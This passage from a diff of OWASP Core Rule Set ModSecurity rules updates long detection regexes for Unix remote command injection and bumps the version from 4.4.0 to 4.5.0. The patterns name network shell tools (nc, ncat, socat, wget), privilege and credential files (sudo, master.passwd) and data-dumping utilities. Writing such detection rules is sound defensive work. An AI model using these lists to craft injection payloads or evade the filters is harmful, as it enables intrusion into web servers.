$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\s\x0b&\)<>\|]" \ +SecRule 
REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&
)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&
&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\s\x0b&\)<>\|]" \ "id:932250,\ phase:2,\ block,\ 
@@ -146,18 +146,18 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&
&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible)|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:ef[\s\x0b&\)\-<>\|]|g(?:passwd|rp)|pass|sh)|lang\+\+|o(?:mm[\s\x0b&\)<>\|]|proc)|(?:ron|scli)[\s\x0b&\)<>\|])|d(?:iff[\s\x0b&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\x0b&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|y
sql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|er(?:f[\s\x0b&\)<>\|]|l[\s\x0b&\)5<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op|se)d|rint(?:env|f[\s\x0b&\)<>\|])|tar(?:diff|grep)?|wd\.db|y(?:thon[23]|3?versions))|r(?:(?:bas|ealpat)h|m(?:dir[\s\x0b&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\x0b&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw|sudo)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:c(?:at|mp)|diff|[ef]?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|
v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible)|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:ef[\s\x0b&\)\-<
